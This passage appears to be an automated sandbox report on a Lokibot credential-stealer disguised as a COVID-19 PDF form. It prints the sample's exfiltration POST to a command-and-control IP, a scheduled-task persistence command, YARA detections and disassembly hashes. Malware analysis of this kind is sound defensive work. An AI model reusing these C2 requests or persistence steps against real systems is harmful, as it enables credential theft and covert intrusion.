                                        Jul 1, 2021 14:36:36.151654005 CEST1407INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                                        Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                        Jul 1, 2021 14:36:36.151689053 CEST1409INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                                        Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                                        Jul 1, 2021 14:36:36.151710987 CEST1410INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                                        Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                                        Jul 1, 2021 14:36:36.151729107 CEST1411INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                                        Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                                        Jul 1, 2021 14:36:36.151747942 CEST1413INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                                        Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                                        Jul 1, 2021 14:36:36.151772022 CEST1414INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                                        Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.34972163.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:36.486135960 CEST1415OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 163
                                        Connection: close
                                        Jul 1, 2021 14:36:36.641344070 CEST1415OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                        Data Ascii: (ckav.ruhardz841675DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                        Jul 1, 2021 14:36:37.338311911 CEST1424INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:36 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                        Jul 1, 2021 14:36:37.338437080 CEST1425INData Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                                        Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                                        Jul 1, 2021 14:36:37.338485956 CEST1427INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                                        Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                        Jul 1, 2021 14:36:37.338534117 CEST1428INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                                        Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                                        Jul 1, 2021 14:36:37.338577032 CEST1430INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                                        Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                                        Jul 1, 2021 14:36:37.338614941 CEST1431INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                                        Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                                        Jul 1, 2021 14:36:37.338654041 CEST1432INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                                        Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                                        Jul 1, 2021 14:36:37.338690996 CEST1433INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                                        Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708 Parent PID: 5512

                                        General

                                        Start time:14:36:18
                                        Start date:01/07/2021
                                        Path:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe'
                                        Imagebase:0x2d0000
                                        File size:1109504 bytes
                                        MD5 hash:EA646520496FD4603AAF0F5778231F0D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: schtasks.exe PID: 5504 Parent PID: 5708

                                        General

                                        Start time:14:36:27
                                        Start date:01/07/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
                                        Imagebase:0x1340000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 4244 Parent PID: 5504

                                        General

                                        Start time:14:36:27
                                        Start date:01/07/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6b2800000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704 Parent PID: 5708

                                        General

                                        Start time:14:36:28
                                        Start date:01/07/2021
                                        Path:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Imagebase:0x7a0000
                                        File size:1109504 bytes
                                        MD5 hash:EA646520496FD4603AAF0F5778231F0D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Analysis Process: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708 Parent PID: 5512 RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCOMMON

                                          Executed Functions

                                          Function 04CF7770, Relevance: 6.5, Strings: 5, Instructions: 298COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: A$M$Z$a$m
                                          • API String ID: 0-1026592392
                                          • Opcode ID: afcd38235c706def052a92ad02214ee8e8b226673fb3b2abbd2a6ee54254f26a
                                          • Instruction ID: 0df32d8050f2456a2a81793c294b21bf029e724ccfdbfa08edf610641ff0b2a7
                                          • Opcode Fuzzy Hash: afcd38235c706def052a92ad02214ee8e8b226673fb3b2abbd2a6ee54254f26a
                                          • Instruction Fuzzy Hash: E2B18B74E02218CFCB54CFAAC884AEDBBF7BF49314F24942AD115B7291E7386A45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04CFA2A8, Relevance: 1.2, Instructions: 1156COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b80eed7bc4d2b350ac9a1df05f8d93831544a019b5488939debcd286e4c8b8de
                                          • Instruction ID: 573eb87f5749ec6d1ad3c5b80da331bd292430de78b508082bb16f947c0959c4
                                          • Opcode Fuzzy Hash: b80eed7bc4d2b350ac9a1df05f8d93831544a019b5488939debcd286e4c8b8de
                                          • Instruction Fuzzy Hash: 0EA27174A001159FCB54DF69C884AAEBBB3FF88304F158069E919EB761EB39ED41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04CFB198, Relevance: 1.0, Instructions: 957COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 689d81a56fa2850a6cc382a8c6d965ac2d74cdf0975b734d9c3a71c0be4cc657
                                          • Instruction ID: 764da3a922254721b7fab97a8659e380e31e0f4cd208da97b6f9fd41c0ed4a2a
                                          • Opcode Fuzzy Hash: 689d81a56fa2850a6cc382a8c6d965ac2d74cdf0975b734d9c3a71c0be4cc657
                                          • Instruction Fuzzy Hash: F4825834A00609DFCB54CF68C984AAEBBF2FF88314F258559E6159B2A1E738FD41CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8B7A0, Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00B8B810
                                          • GetCurrentThread.KERNEL32 ref: 00B8B84D
                                          • GetCurrentProcess.KERNEL32 ref: 00B8B88A
                                          • GetCurrentThreadId.KERNEL32 ref: 00B8B8E3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 5912b7d8787f83d0820d558df1c1e5230bfc622e9d42eced8ed0b8367fef758f
                                          • Instruction ID: bed280973e4461a4d4c6d74842492502e4ef922f49ad76bca00feaaabb2b3eda
                                          • Opcode Fuzzy Hash: 5912b7d8787f83d0820d558df1c1e5230bfc622e9d42eced8ed0b8367fef758f
                                          • Instruction Fuzzy Hash: 7D5175B0D006498FDB10DFA9D688BDEBBF4EF49314F2484A9E059A3360DB749884CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8B7B0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00B8B810
                                          • GetCurrentThread.KERNEL32 ref: 00B8B84D
                                          • GetCurrentProcess.KERNEL32 ref: 00B8B88A
                                          • GetCurrentThreadId.KERNEL32 ref: 00B8B8E3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: efaaad06f47e02d6c87782ef3fb0f0fc31f95aa622435aeac1dcc647ac3a522d
                                          • Instruction ID: 057e9501e6ef209166a047247f939dbd6d92e6f2883c662c82355ee9682594f0
                                          • Opcode Fuzzy Hash: efaaad06f47e02d6c87782ef3fb0f0fc31f95aa622435aeac1dcc647ac3a522d
                                          • Instruction Fuzzy Hash: D25146B0D006098FDB14DFA9D648BDEBBF4EF48314F248499E459A7360DB749984CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B894C8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B8970E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 39b7e254a400b1e0485c15f9e5f4b0bd33b68e19048edc79c3661382ea5995bc
                                          • Instruction ID: bfbdbce811bfda6c2a0f1f49b697fd1e14321981f1c9d7cb082d6ef448a2e833
                                          • Opcode Fuzzy Hash: 39b7e254a400b1e0485c15f9e5f4b0bd33b68e19048edc79c3661382ea5995bc
                                          • Instruction Fuzzy Hash: 06714370A00B058FDB24EF6AC5457AAB7F1FF88304F14896AE44AD7A60DB34E905CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8FCCC, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B8FDEA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: b11716dfa3ca7c568c98dc42ee3f7eb7202d78c83ed9ebe18d31b23e7f29b741
                                          • Instruction ID: ee1dec09ae4634d305220e3569743aaa4cec1ad16a8d188dea0bce659b4625ef
                                          • Opcode Fuzzy Hash: b11716dfa3ca7c568c98dc42ee3f7eb7202d78c83ed9ebe18d31b23e7f29b741
                                          • Instruction Fuzzy Hash: DA51C0B1D043099FDB14CFA9C884ADEBBF5FF48314F24852AE819AB220D7749985CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8FCD8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B8FDEA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 9c16f6b7828073209991392ad8c06f419d8a7c1ddcc4858d4996a9cc1b13c776
